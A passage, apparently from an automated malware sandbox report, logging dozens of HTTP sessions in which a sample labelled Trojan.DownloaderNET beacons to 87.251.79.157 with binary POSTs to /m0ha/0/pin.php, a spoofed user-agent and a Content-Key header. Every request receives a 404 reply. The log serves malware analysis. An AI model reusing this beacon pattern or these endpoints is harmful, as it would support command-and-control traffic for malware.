                                              Mar 15, 2021 20:01:35.166644096 CET | 1205 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:34 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              47 | 192.168.2.5 | 49743 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:35.414645910 CET | 1206 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:37.513856888 CET | 1207 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:35 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              48 | 192.168.2.5 | 49744 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:37.905678034 CET | 1207 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:38.861871004 CET | 1208 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:37 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              49 | 192.168.2.5 | 49745 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:39.134248018 CET | 1209 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:39.420017958 CET | 1209 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:39 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              5 | 192.168.2.5 | 49700 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:03.117404938 CET | 1138 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:03.381764889 CET | 1138 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:03 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              50 | 192.168.2.5 | 49746 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:39.905941963 CET | 1210 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:40.780755997 CET | 1211 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:39 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              51 | 192.168.2.5 | 49747 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:41.068304062 CET | 1211 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:41.614192009 CET | 1212 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:41 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              52 | 192.168.2.5 | 49748 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:41.839658022 CET | 1213 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:42.790277004 CET | 1213 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:41 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              53 | 192.168.2.5 | 49749 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:43.049675941 CET | 1214 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:43.664397955 CET | 1215 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:43 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              54 | 192.168.2.5 | 49750 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:43.914421082 CET | 1215 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:44.222182035 CET | 1216 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:43 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              55 | 192.168.2.5 | 49751 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:44.461999893 CET | 1217 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:44.709526062 CET | 1217 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:44 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              56 | 192.168.2.5 | 49752 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:44.936400890 CET | 1218 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:45.928817987 CET | 1219 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:44 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              57 | 192.168.2.5 | 49753 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:46.167454958 CET | 1219 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:46.622526884 CET | 1220 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:46 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              58 | 192.168.2.5 | 49754 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:46.877665997 CET | 1221 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:47.542124987 CET | 1221 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:46 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              59 | 192.168.2.5 | 49755 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:47.791488886 CET | 1222 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:48.513504982 CET | 1223 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:47 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              6 | 192.168.2.5 | 49701 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:04.226190090 CET | 1139 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:07.057657003 CET | 1140 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:04 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              60 | 192.168.2.5 | 49756 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:48.767344952 CET | 1223 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:49.270061970 CET | 1224 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:48 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              61 | 192.168.2.5 | 49757 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:49.520612955 CET | 1225 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:49.785249949 CET | 1225 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:49 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              62 | 192.168.2.5 | 49758 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:50.051361084 CET | 1226 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:50.317364931 CET | 1227 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:50 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              63 | 192.168.2.5 | 49759 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:50.560163021 CET | 1227 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:50.805489063 CET | 1228 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:50 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              64 | 192.168.2.5 | 49760 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:51.055531025 CET | 1229 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:51.371975899 CET | 1229 | IN | HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:51 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              65 | 192.168.2.5 | 49761 | 87.251.79.157 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Mar 15, 2021 20:01:51.624269962 CET | 1230 | OUT | POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:51.938138008 CET  1231                IN         HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:51 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                              66          192.168.2.5  49762        87.251.79.157   80                C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp                            kBytes transferred  Direction  Data
                                              Mar 15, 2021 20:01:52.186492920 CET  1231                OUT        POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:52.449352980 CET  1232                IN         HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:52 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                              67          192.168.2.5  49763        87.251.79.157   80                C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp                            kBytes transferred  Direction  Data
                                              Mar 15, 2021 20:01:52.696928978 CET  1233                OUT        POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:53.726037025 CET  1233                IN         HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:52 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                              68          192.168.2.5  49764        87.251.79.157   80                C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp                            kBytes transferred  Direction  Data
                                              Mar 15, 2021 20:01:53.959341049 CET  1234                OUT        POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:54.642890930 CET  1235                IN         HTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:53 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                              69          192.168.2.5  49765        87.251.79.157   80                C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Timestamp                            kBytes transferred  Direction  Data
                                              Mar 15, 2021 20:01:54.879328012 CET  1235                OUT        POST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
